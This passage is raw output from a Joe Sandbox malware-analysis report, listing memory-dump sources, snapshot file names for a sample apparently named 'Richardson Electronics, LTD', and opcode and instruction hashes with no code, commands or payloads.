                                                              • Opcode Fuzzy Hash: dccafc1b43c83948bf55c5fd92efc18c54504a6e7dc352030a76bd0df6cda08f
                                                              • Instruction Fuzzy Hash: ED01B1357403008FD3A99A25D454A3B7BE2EFC5324F14892CF5964B794CBB1EC42CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f2c50982ac51557465fc94f70f0737743992b476ca3c8dc8bee6ea9cf9d17a5f
                                                              • Instruction ID: 79770eabd1bea53beee7db72a11a3afe0244d29c509c59defa0a1a476c8663dc
                                                              • Opcode Fuzzy Hash: f2c50982ac51557465fc94f70f0737743992b476ca3c8dc8bee6ea9cf9d17a5f
                                                              • Instruction Fuzzy Hash: 8BF0E2363852162BD796222A78106FF7FDA8FC2551F048127F940CB682CE648957C3F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 326586cbba3675256fc2124b64e564478f38226975952451f364119a131638ea
                                                              • Instruction ID: fa86efc386937c1ad1f4c05c6a63b8ea7efd01968ebc09c195b90d2efaff2e0d
                                                              • Opcode Fuzzy Hash: 326586cbba3675256fc2124b64e564478f38226975952451f364119a131638ea
                                                              • Instruction Fuzzy Hash: E801DF70C25348DFCB95DFB8C5046AEBFF4AB06200F2042EEE515E7281D3B20A81CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9824995d5e84f861978438828ba553dc26ce5ee8c64f6d6e5da27ab83da654b5
                                                              • Instruction ID: 74f990b77ab12f727b7e95ef65cd3c4744c783c9596413ab0eb08793d03d34be
                                                              • Opcode Fuzzy Hash: 9824995d5e84f861978438828ba553dc26ce5ee8c64f6d6e5da27ab83da654b5
                                                              • Instruction Fuzzy Hash: 11016D34E10259CBCB24DE68D5167EEBAF2BB88B04F10462EE611B7341CB760D01CBDA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c01d04e75ab48b06a110c9684a788284b1679cbd5d6ffa464ac95f54a1c02c1
                                                              • Instruction ID: 79a7cea402a57a23429c78c2cba83a52f8e91fa19617b0e384d8f27a407b409b
                                                              • Opcode Fuzzy Hash: 5c01d04e75ab48b06a110c9684a788284b1679cbd5d6ffa464ac95f54a1c02c1
                                                              • Instruction Fuzzy Hash: 8E11AF74A4126ACFDBA4DF64D854BDCBBB2BB49304F1085E9E54AA7340CB315E91CF04
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 172d1bb81f37cd9b26c8a9d368fe284696640d2313b7c82d25b31bb1427d8a58
                                                              • Instruction ID: a61e8b9a3b9678fc4ebd80339d930ffe415549ca4c986ba394f53100db3a16a7
                                                              • Opcode Fuzzy Hash: 172d1bb81f37cd9b26c8a9d368fe284696640d2313b7c82d25b31bb1427d8a58
                                                              • Instruction Fuzzy Hash: 4B018F31C0434AAFCF129F94D8008EEBF78FF4A310F04914AE99877251D73596A2CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 624d139dc08aa706fde0b9d138d39493b3721c8309bc481ee82321aec2249101
                                                              • Instruction ID: 7dba14eb8bcc08e47027669a84f9573796066d4513375dce021ef07034384517
                                                              • Opcode Fuzzy Hash: 624d139dc08aa706fde0b9d138d39493b3721c8309bc481ee82321aec2249101
                                                              • Instruction Fuzzy Hash: E5016975340618EFC719EB64E41891ABBA2EBD8B11B108128EA468B354CF36EC12CBD4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 22979ea6bd4d7971a3005a1a5703b3bd66aae2d2599fbf22fb1372b19bcfcfa9
                                                              • Instruction ID: 998ce5c99dd70fce39ce9d10ac3b5ecc9839052613eee85839b261220a743956
                                                              • Opcode Fuzzy Hash: 22979ea6bd4d7971a3005a1a5703b3bd66aae2d2599fbf22fb1372b19bcfcfa9
                                                              • Instruction Fuzzy Hash: E6F0E936F442616FE3184A19A800B2FF7A9FBC9710F184429D5069B380CBB2EC41C7D4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3da10c7fa7d5ec4261d0a059301c934ca338a8233deafe797b5b93f77666ca19
                                                              • Instruction ID: 37ab23d3ec6e81f0888a62be94c30ff0b2582812532e54c460e5c728da50ba0b
                                                              • Opcode Fuzzy Hash: 3da10c7fa7d5ec4261d0a059301c934ca338a8233deafe797b5b93f77666ca19
                                                              • Instruction Fuzzy Hash: 65F0AF39344240DFC309CB29D854D3ABBE6EFC9610B1440AAF986CB762CA71EC02CB50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f10b1f000e65d81fd30882348bee6eaea13f30e08c139b62313c4e19954041cb
                                                              • Instruction ID: 5fa0a9f623f0e83e3c7d4bcb8dc4974b25b34ddb9ed3b7f5f15319146cf2e7ff
                                                              • Opcode Fuzzy Hash: f10b1f000e65d81fd30882348bee6eaea13f30e08c139b62313c4e19954041cb
                                                              • Instruction Fuzzy Hash: 40F0B435A48348AFDB0ACB69A8586DD7FF6DF81220F0880D6E04587151DB785A81C795
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4e944e9db43dd70731fd84153f57be5f5b7c7a96234b966b28a0c0626706a16d
                                                              • Instruction ID: 5d095018c802c563b495171c77b6ce9f90e590f7eafa72b64312546a6b1438fb
                                                              • Opcode Fuzzy Hash: 4e944e9db43dd70731fd84153f57be5f5b7c7a96234b966b28a0c0626706a16d
                                                              • Instruction Fuzzy Hash: F4F0E770D1520DDFCB84DFA8D5446AEBBF8EB09304F1046A9A919E3240E7725A81DB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 957c6e9952114f8fcd7c2943281dcbc81d159e76acc346115e30625ea50a3c1a
                                                              • Instruction ID: 85eb22370527e880960e508749766d9ffca6174ea7cc4865c441e0ca1b8f4086
                                                              • Opcode Fuzzy Hash: 957c6e9952114f8fcd7c2943281dcbc81d159e76acc346115e30625ea50a3c1a
                                                              • Instruction Fuzzy Hash: DEF06D74949248BFC780DFB8D8416A9BFF8AB49200F14C0DAE888D7241D2358A81CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10e0b6c31bc96fcf961e5a1ffdfec413787ff46db395db7ab147132fd8d012df
                                                              • Instruction ID: 09a54f5eb56651d55cbdbe9ab61b24dc5280f31fcbffd74349cddd56cbf88385
                                                              • Opcode Fuzzy Hash: 10e0b6c31bc96fcf961e5a1ffdfec413787ff46db395db7ab147132fd8d012df
                                                              • Instruction Fuzzy Hash: 20F09430C99348EFCB95CFB494002ADBFF0EF89310F1080AAD884A6210D2398E91DB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cda3bc7ba7dfaa6fc836d91556333962205d67668b1a9988be8e5fbeb744c9cc
                                                              • Instruction ID: abeda802f8af933171cce11de746c1bc57b6856ff7e1c255329e512f2db3bf24
                                                              • Opcode Fuzzy Hash: cda3bc7ba7dfaa6fc836d91556333962205d67668b1a9988be8e5fbeb744c9cc
                                                              • Instruction Fuzzy Hash: 96011435E50208DFDF95CF99C448BAEBBB2FB8A310F108128E409A62A4CB395881CF45
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61ba727b555c0b296bb36372e79b72ae65a2f2bf36a25b7695ed649c25587b38
                                                              • Instruction ID: 18bfc267dd46a82274df7a6174533430749136eae8f35362180ac12af9919165
                                                              • Opcode Fuzzy Hash: 61ba727b555c0b296bb36372e79b72ae65a2f2bf36a25b7695ed649c25587b38
                                                              • Instruction Fuzzy Hash: 63019E74D55259CFEBA1CF24D8447ACBBB2BB0A308F5441A9D589A2281C7B54AC88F04
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 47064bff153a59b02e091a087abb4a4d8328a8a91c64f611ae558d2df054a667
                                                              • Instruction ID: 7688e19e6c93e555f1acf2b8ea64e26fd0d3fb40522c3e5d04fbd47be04ea650
                                                              • Opcode Fuzzy Hash: 47064bff153a59b02e091a087abb4a4d8328a8a91c64f611ae558d2df054a667
                                                              • Instruction Fuzzy Hash: 5901E470995218CFEB659F54E858BADBB76FB4A309F105299D90AA3280CB714D84CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ffe4b40d42f0cff535dc938c48e5317ccb01851eea7247788cf4de90f6e6e2d8
                                                              • Instruction ID: ec54a20a02246887d3af771d105badcdb8ef12eff613c2d0ee8cfcbacbafb6b9
                                                              • Opcode Fuzzy Hash: ffe4b40d42f0cff535dc938c48e5317ccb01851eea7247788cf4de90f6e6e2d8
                                                              • Instruction Fuzzy Hash: 48F0E731C0020AEBCF01DF99D8049EEBB79FF89324F04C619E95877210D771AAA6DB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 530649d693a3d32728a97af8c70b5bba45fa141478aad143dfc25111fb39afe0
                                                              • Instruction ID: 7a2cc301e7bc2e09e98a4977ffb98ecc82b15aa9890a9c174ba7fa43ffdce32d
                                                              • Opcode Fuzzy Hash: 530649d693a3d32728a97af8c70b5bba45fa141478aad143dfc25111fb39afe0
                                                              • Instruction Fuzzy Hash: CBF0E531610361CFC359AB38D41A8EE3BE5FFC636030149BFD106CB6A1DA319C068B52
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b87d41a56d68d4891cbfd99177bc946fbb7afeeb0def7665ffd7e25165aadeaa
                                                              • Instruction ID: 9d87a9b9f277b98f3a65fbd9d16e9f6730120a3989c31499097cd01edd5b8fb3
                                                              • Opcode Fuzzy Hash: b87d41a56d68d4891cbfd99177bc946fbb7afeeb0def7665ffd7e25165aadeaa
                                                              • Instruction Fuzzy Hash: 80F05E35340200DFC708DB69D854D2AB7EAEFC8B21B148069FA46CB360CA71EC02CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c2d07324f4d06c0efdf4bb447624dffcd9f7fe482334cc761eb774edbbcef9cf
                                                              • Instruction ID: 258fcd0b731e589b92d0b7c8d7bef520f9f9cbbe48ec08cd44a433e0b0de393d
                                                              • Opcode Fuzzy Hash: c2d07324f4d06c0efdf4bb447624dffcd9f7fe482334cc761eb774edbbcef9cf
                                                              • Instruction Fuzzy Hash: 9CF06D34D09288EFCB81CFE8D9146ADBFF4AF09200F14C0DAE8A8D7292D2358A51DF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7926c1d4c76925b7d3029011f1bf84187d87fc41bd8d6f0eb5ff85e2c2ce1cf0
                                                              • Instruction ID: 13263f8d1ab54175ab94f43c88f7482db7d46c370a14c457e37827928934e0be
                                                              • Opcode Fuzzy Hash: 7926c1d4c76925b7d3029011f1bf84187d87fc41bd8d6f0eb5ff85e2c2ce1cf0
                                                              • Instruction Fuzzy Hash: 7D01C878951219DFDBA4DF18EC84BA97BB2BB0A304F4081E5D509E7354DB715E84CF00
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 23c102e8a0b2b331d072518f4e444534efd18c2070d1f93f2be540efe24c3533
                                                              • Instruction ID: 1623e45d8725b8867dff6993ffa5270bed37eba0372d9b73ced0bb6c199b3e9e
                                                              • Opcode Fuzzy Hash: 23c102e8a0b2b331d072518f4e444534efd18c2070d1f93f2be540efe24c3533
                                                              • Instruction Fuzzy Hash: EBF05470D40256CFDB54EFBCE50D2AEBBF4EF49210B48866AC606D7245EB349614CB81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 446405eadfa6d736a37cf8b92e9c24f9a927a8718e39ecc31d71e26205507708
                                                              • Instruction ID: dd66a94face8a59b4d0b8a980327713e4149dd24e77c88ed5151d696f1ce77e4
                                                              • Opcode Fuzzy Hash: 446405eadfa6d736a37cf8b92e9c24f9a927a8718e39ecc31d71e26205507708
                                                              • Instruction Fuzzy Hash: EBF0A0712443069BD7199A2EEC84C4BBF9EDFD0320700D63EE64987622CEB5E95982A0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e31228a68b19958678e4a9f9d8391b5e05c3cab77baaa39f2e879f66242c4fe4
                                                              • Instruction ID: 6043dbe635cfc4ee49bfa25b74905ed76bb1675e23e1279106597b6692e96f6f
                                                              • Opcode Fuzzy Hash: e31228a68b19958678e4a9f9d8391b5e05c3cab77baaa39f2e879f66242c4fe4
                                                              • Instruction Fuzzy Hash: A9F027308A9388DFD7E1CF78D44829A7FF49B06110F2002EAD58097292D6320E81D761
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fda81995d1fa2ae9f647f35868c29a409f8dc6fdd2271a70e687ab149115898a
                                                              • Instruction ID: 9e504b3d5db2ea88e76aa34daa5b1851804626649e1efd0dde6a71f197d29ed9
                                                              • Opcode Fuzzy Hash: fda81995d1fa2ae9f647f35868c29a409f8dc6fdd2271a70e687ab149115898a
                                                              • Instruction Fuzzy Hash: 9DF01270D09348AFCB91CFA8C4056AEBFF8EF0A300F10C6AAD844A6211C2354A84DB81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a1b8a2b27ab6f8cb8acea183865d14edee893965cd063fec535b1051e01276b
                                                              • Instruction ID: f53382b8dfd919df67bea7ad5872566e450df5cc5b5e652388ae3f980b361bf1
                                                              • Opcode Fuzzy Hash: 7a1b8a2b27ab6f8cb8acea183865d14edee893965cd063fec535b1051e01276b
                                                              • Instruction Fuzzy Hash: 2CF05E74C45349EFCB51CFB4D4456ACBFF0EF85310F1481AAD89497291C2354A92DF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25a4f6baf7c87dc20a0bb5ed076a68cb985af37bee5ca20f301991f33c209d3d
                                                              • Instruction ID: 790e924be8c6a7421227c808ba873e0415b3af1b846540827a028bb2c8d1b9c4
                                                              • Opcode Fuzzy Hash: 25a4f6baf7c87dc20a0bb5ed076a68cb985af37bee5ca20f301991f33c209d3d
                                                              • Instruction Fuzzy Hash: AFF0E2308893C49FC7A2CB78D80C39A7FF4AB03110F0402EAE8C497692D6705B85D392
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c03201e7c063f5ecc3c9cc93473ee3e873e73e2864d6bff42d16c44bb546ed96
                                                              • Instruction ID: e2000a5deb2e80dd5ac93da7b8c7f97d919d66920ee63ef8483af943f983cae1
                                                              • Opcode Fuzzy Hash: c03201e7c063f5ecc3c9cc93473ee3e873e73e2864d6bff42d16c44bb546ed96
                                                              • Instruction Fuzzy Hash: 7301C478A142288FCB65DF24D995AEEB7BAFB4C300F1050D9A80DA3384DB345F818F51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4d63e2fb2320ced45d3dfabac3f65cca3b27150b0a55fc547b12b962e057f219
                                                              • Instruction ID: aa88557befa29b1894961c311700293d2eeb5426c4548b152cf16ed3e0f1a608
                                                              • Opcode Fuzzy Hash: 4d63e2fb2320ced45d3dfabac3f65cca3b27150b0a55fc547b12b962e057f219
                                                              • Instruction Fuzzy Hash: 95F0E534989344DFC75ADB94E5405A8BFB4DF47304F1485DDD80457382C6316E47D785
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 176d5520588b51023b793c563f42f199b1e28e48a95f1e1f27b706da826ea0af
                                                              • Instruction ID: f9a2271bc8217fd46705f5f97fb3de948bdde9645fc72e00ee7b72ba818dd69d
                                                              • Opcode Fuzzy Hash: 176d5520588b51023b793c563f42f199b1e28e48a95f1e1f27b706da826ea0af
                                                              • Instruction Fuzzy Hash: 83F0A031849348EFDB558FB4D404AECBFF4EF16311F1082AAD84057220E7324AE5DB41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8525310868ae70552236856fb84bee073c32feb712190a55e67421885d1ffefd
                                                              • Instruction ID: e1a6e85587bd5fdefa70d9895b1490a8b275d13ef39d042b870e888397157f72
                                                              • Opcode Fuzzy Hash: 8525310868ae70552236856fb84bee073c32feb712190a55e67421885d1ffefd
                                                              • Instruction Fuzzy Hash: 0DF05830809348EFCB51EFA8C404AADBFB4EF0A300F1042EAE8109B622D2345A24DF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9ed91597784fb613dfb2102e582b1b992141c2e18774cb48ff08b98660fb6e38
                                                              • Instruction ID: f02357c5db1984174c866a7f5f4faf9924ce71542db66bf49dcd8a7fab5980aa
                                                              • Opcode Fuzzy Hash: 9ed91597784fb613dfb2102e582b1b992141c2e18774cb48ff08b98660fb6e38
                                                              • Instruction Fuzzy Hash: 18F01C74D04248EFCB80DFA8D944AADBFF8AB48200F14C09AAC58D7341D6359B51EF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cdd7efa0d57be3bfe78dac4ed962a6d77620b85d41931fe44d7e47565b8634f
                                                              • Instruction ID: 2b5ee83dedc3c6aff8e9be91ac8f319ab08e8e2d406a7b1f931c3595fe9b31cc
                                                              • Opcode Fuzzy Hash: 8cdd7efa0d57be3bfe78dac4ed962a6d77620b85d41931fe44d7e47565b8634f
                                                              • Instruction Fuzzy Hash: 32E09230C593949FC781CBA8D5116FCBFF69B0A101F1846DAD8498B251D7368E45C750
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0cef853259201cc0e2c50411ec849a2cb502c94940698d3e8b1c0c4e6d8336bb
                                                              • Instruction ID: f73a5e1f15687627f6ea825b6ec495f516834a8160a4a317a9e90c5c7e5c6b19
                                                              • Opcode Fuzzy Hash: 0cef853259201cc0e2c50411ec849a2cb502c94940698d3e8b1c0c4e6d8336bb
                                                              • Instruction Fuzzy Hash: 4EE09270C8A3849FC741CF6498055EE7FF89B86200F10C2DAD80467651C1340F65DBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 897a2c6d647823f209c521b56df6cc7c2335859be3bec7d2b1417ed3801b0710
                                                              • Instruction ID: 89d36be9723d90b8caee35505ca54451b92151b57d5064f7303447053bacde31
                                                              • Opcode Fuzzy Hash: 897a2c6d647823f209c521b56df6cc7c2335859be3bec7d2b1417ed3801b0710
                                                              • Instruction Fuzzy Hash: BEF0D476900219EFDB51CF90CD80FDDB7BAAB08304F24819AA509A6290D771AB89CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49890ab86b604012619df4d447db6e2574b09516dde932e1e797181a68640465
                                                              • Instruction ID: bb652317e72e69e761816b09ff66a70ecc93347b8796e2883cc8bebc18b8df8f
                                                              • Opcode Fuzzy Hash: 49890ab86b604012619df4d447db6e2574b09516dde932e1e797181a68640465
